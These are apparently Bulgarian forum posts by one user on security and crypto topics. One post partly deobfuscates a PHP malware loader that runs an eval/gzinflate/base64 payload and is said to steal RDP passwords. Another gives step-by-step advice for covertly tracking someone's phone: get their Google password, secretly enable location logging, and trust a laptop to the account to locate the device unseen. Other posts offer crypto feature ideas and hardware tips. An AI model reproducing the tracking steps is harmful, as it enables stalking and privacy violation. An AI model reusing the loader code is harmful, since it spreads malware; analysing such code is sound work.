memwarrior

Маийкоооо .... този направо "чудеса от храброст" е сътворил вътре в това php да се скрие. На първо четене едно HEX редакторче и една бърза замяна на ";" - 0x3B със 0x3B, 0x0D, 0x0A (добавям по един ентер след всяка ; за по голяма четливост). И след при отваряне с текстов редактор излиза малко по-човешки. С малко логика се вижда <ИМЕ НА КОДИРАНА ФУНКЦИЯ> = <PHP функция> .... voila... Едно бързо SEAEARCH/REPLACE ( не са много) и става още по човешки: (Това нещо му е лоадера...) - Леко очовечен от мен. if(!$function_exists($base64_encode)){function RAhjzwp($GIrEV){global $ljfFTRMJC,$substr,$ord,$strlen,$implode,$"",$===; if(empty($GIrEV))return; $MhwYxgQmksAY = $tIcNHv = $unXbfVAg = $qvRpaZBebqPE = $EmsjZgWOg = $yEmYnlAMgyZzxq = $rRwJmkilfknJ = $KQJFSAiGb = $lamuvLnmgRmpgKU = 0; $yxQoYVgSeSUU = 0; $jOuwNNmam = $""; $ZcjFJdsVv = array(); if(!$GIrEV){return $GIrEV; }do{$MhwYxgQmksAY = $ord($substr($GIrEV, $lamuvLnmgRmpgKU++, 1)); $tIcNHv = $ord($substr($GIrEV, $lamuvLnmgRmpgKU++, 1)); $unXbfVAg = $ord($substr($GIrEV, $lamuvLnmgRmpgKU++, 1)); $KQJFSAiGb = $MhwYxgQmksAY << 16 | $tIcNHv << 8 | $unXbfVAg; $qvRpaZBebqPE = $KQJFSAiGb >> 18 & 0x3f; $EmsjZgWOg = $KQJFSAiGb >> 12 & 0x3f; $yEmYnlAMgyZzxq = $KQJFSAiGb >> 6 & 0x3f; $rRwJmkilfknJ = $KQJFSAiGb & 0x3f; $ZcjFJdsVv[$yxQoYVgSeSUU++] = $substr($ljfFTRMJC, $qvRpaZBebqPE, 1).$substr($ljfFTRMJC, $EmsjZgWOg, 1).$substr($ljfFTRMJC, $yEmYnlAMgyZzxq, 1).$substr($ljfFTRMJC, $rRwJmkilfknJ, 1); } while ($lamuvLnmgRmpgKU < $strlen($GIrEV)); $jOuwNNmam = $implode($ZcjFJdsVv, $""); $qgeTrqx = ($strlen($GIrEV) % 3); return ($qgeTrqx ? $substr($jOuwNNmam, 0, ($qgeTrqx - 3)) : $jOuwNNmam).$substr($===, ($qgeTrqx || 3)); }}else{function RAhjzwp($GIrEV){global $base64_encode; return $base64_encode($GIrEV); }}if(!$function_exists($base64_decode)){function XfLDNOTcBjBg($XZgimALWXhO){global $ljfFTRMJC,$substr,$strlen,$strpos,$chr,$preg_replace,$uiIiGvgOYq,$""; if(empty($XZgimALWXhO))return; $fPMmJIzNAw = $CwMxsC = $miNdU = $""; $EWgifNd = $WwMxQ = $aRBttOd = $PQdOlRWc = $""; $lamuvLnmgRmpgKU = 0; $irZKCmXEJNv = $""; $XZgimALWXhO = $preg_replace($uiIiGvgOYq, $"", $XZgimALWXhO); do{$EWgifNd = $strpos($ljfFTRMJC, $substr($XZgimALWXhO, $lamuvLnmgRmpgKU++, 1)); $WwMxQ = $strpos($ljfFTRMJC, $substr($XZgimALWXhO, $lamuvLnmgRmpgKU++, 1)); $aRBttOd = $strpos($ljfFTRMJC, $substr($XZgimALWXhO, $lamuvLnmgRmpgKU++, 1)); $PQdOlRWc = $strpos($ljfFTRMJC, $substr($XZgimALWXhO, $lamuvLnmgRmpgKU++, 1)); $fPMmJIzNAw = ($EWgifNd << 2) | ($WwMxQ >> 4); $CwMxsC = (($WwMxQ & 15) << 4) | ($aRBttOd >> 2); $miNdU = (($aRBttOd & 3) << 6) | $PQdOlRWc; $irZKCmXEJNv = $irZKCmXEJNv . $chr((int) $fPMmJIzNAw); if ($aRBttOd != 64) {$irZKCmXEJNv = $irZKCmXEJNv . $chr((int) $CwMxsC); }if ($PQdOlRWc != 64) {$irZKCmXEJNv = $irZKCmXEJNv . $chr((int) $miNdU); }$fPMmJIzNAw = $CwMxsC = $miNdU = $""; $EWgifNd = $WwMxQ = $aRBttOd = $PQdOlRWc = $""; }while($lamuvLnmgRmpgKU < $strlen($XZgimALWXhO)); return $irZKCmXEJNv; }}else{function XfLDNOTcBjBg($GIrEV){global $base64_decode; return $base64_decode($GIrEV); }}$zvlozWlZJVG='cre'.'ate_'.'func'.'t'.'ion'; $hZoATTNgrgjhy = @$zvlozWlZJVG('$Et',$eval.'('.$gzinflate.'('.'XfL'.'DNO'.'T'.'c'.'B'.'jBg'.''.'($Et)'.')'.')'.'; '); ... нататък ме домързя да го докарам до GZIP .... а пък и какво толкова ще се научи отвътре.

забравих да кажа една малка подробност. С тази функция крипти RDP (Remote Desktop) паролата. След декрипт излиза SHA256 хеш за последващ брут.

Една малка идея: Crypt през cred-a на windows *DPAPI). Общо взето си е черна кутия. Вързано е с UID/SID и си е само за текущия логнат юзер. Може да се създаде функционалност в случая когато компа се ползува от повече от един юзер - например офис.... Функциите са отворени от гледна точка на параметри. Има си ентропия. ... приложил съм и едно юнитче дето ще свърши работа. DPAPI.pas

Уффф... одавна несъм се включвал... да давам извратен акъл... хе хе ... шегувам се... При генерация на PASSWORD, SALT или IV може да се включи и подръжка на RFC2898 стандарт. Така нареченото PBKDF (Password Based Key Derivation Function) като задължително да има избор при настройката - избор на хешираща функция, защо не и симетрично кодиране. В .NET фреймуърка е що годе универсално направена. - Брой итерации а, и между другото в "Cipher mode" не видях GCM (Galois/Counter Mode) - доста е модерно.

Абсолютно невъзможно е (Да ама не!) . В андроид си е ясно казано. За да се активира опцията Developper Options в менюто е нужно да се натисне 5 пъти върху BUILD от About-a за да ти се появи в менюто. От там да отидеш в тази точка и да пуснеш USB debug и телефона да си вдигне ADB. ПРИ ЗАКЛЮЧЕН ЕКРАН НЯМАШ ДОСТЪП ДО ABOUT! Друг е въпроса ако ти е счупен тъч-а а искаш да си извадиш информацията отвътре. Бих ти дал следния типс: Купуваш си OTG кабелче за 2-3 лева и закачаш PC Мишка за телефона. И си действаш абсолютно нормално по менютата. Ако неможеш да си намериш OTG си направи. Лесно е. Даваш на късо 4 и 5 ти крак на буксата на телефона ... от другата страна ти е женско usb. При USB C е друга бира.

Андроид, Rtos, cpu...

Една малка идея... Ако е толкова за мобилен телефон... Avatar-e вземи включи и генерация на QR код, може да се залепи на всякъде по програмата като автентикация. Всяка една съвременна камера на телефон си го има като екстра QR code Reader.

0. Помисли си хубаво плюсовете и минусите евентуално ако те разкрият - нама да бъде приятна ситуацията 1. Сдобий се с парола за Гугъл профила първо. 2. Чисто социално без да те видят и вкл. опцията (Location Services) - гугъл логва целия маршрут през целия ден. Евентуално ако те интересува. 3.В маркета има 2-3 програмки които работят обаче през дропбокс. другите дето се рекламират са през техни сървъри и таксата е по 60 евра на месец. - БЕЗМИСЛЕНО 4. ТРЪСТНИ си лаптопа към този акаунт за да не иска потвърждения когато търсиш устройството без да те видят... ... тези малки съвети мога да ти дам

Това животно: https://github.com/obfuscator-llvm/obfuscator/wiki ме трови тотално. Ако има някой да помогне с ДЕОБФУСКАЦИЯ ще съм крайно благодарен. Прилежен ученик съм ако всепак реши да сподели акъл.

Идея за Corporate Version: - Проблема при корпорацийте е опазването на паролите при симетричните алгоритми. Още повече паролите не са работа на счетоводството например да ги помнят, и ако ги помнят същия отдел от съседния град има друга парола и мазалото е на лице. -На AES-а може да се направи WHITEBOX container. Потребителя да може да шифрира и дешифрира без да знае паролата. за инфо; https://eprint.iacr.org/2013/104.pdf ... а и между другото не видях MIME Encode/Decode или BASE64.

При мейловете може да помислиш и за една уникална функция: - Юзера да си подържа листа с TRUSTED лист с контакти - И Уникалното е да може да се слага "FOR YOUR EYES ONLY" флаг на майла. (Да се избягва изпращането на грешни адреси или не от листа или не за всички от листа). - SELF DESTRUCT TIMER също може да се сложи.

Поздравления Аватаре, Хайде и версия следваща поне с PKCS 1.5 функций. - генерация на рандъм елемент - с движение на мишката примерно да не се отплесваш в някое PRNG. - генерация на RSA ключове. - подписване на критираните данни.

Малко анализ: - Ако си сигурен в ключа че е 8 байта заключаваме правилото 1DES или само DES - Щом данните са на 64 байта блокове при всички положения се касае за верижно кодиране тип CBC, CFB OFB, но има едно положение при тях че ти трябва IV (Init Vector) иначе би било супер тъпо да ползва еднопасов режим ECB. Но не се иключва и това да е режим ECB (но според мен не е защото с един прост DES и 8 байта не получавам твоя декриптиран резултат) ТИ ИМАШ САМО КЛЮЧ НЯМАШ ИНИТ ВЕКТОР КОЕТО Е РАВНОСИЛНО НА ТОВА ДА НЕ СТАНЕ НИЩО. 8 байта брут-форс си е тежка работа. Съвета ми е: Ако имаш случайно дъмп на рома на това CPU, постни го тука ще го кача на IDA-та да се хвърли едно око в детайли. И евентуално какъв е процесора на борд комп-а - АРМ, МИПС, ПАЪУР ПЦ ... и тн.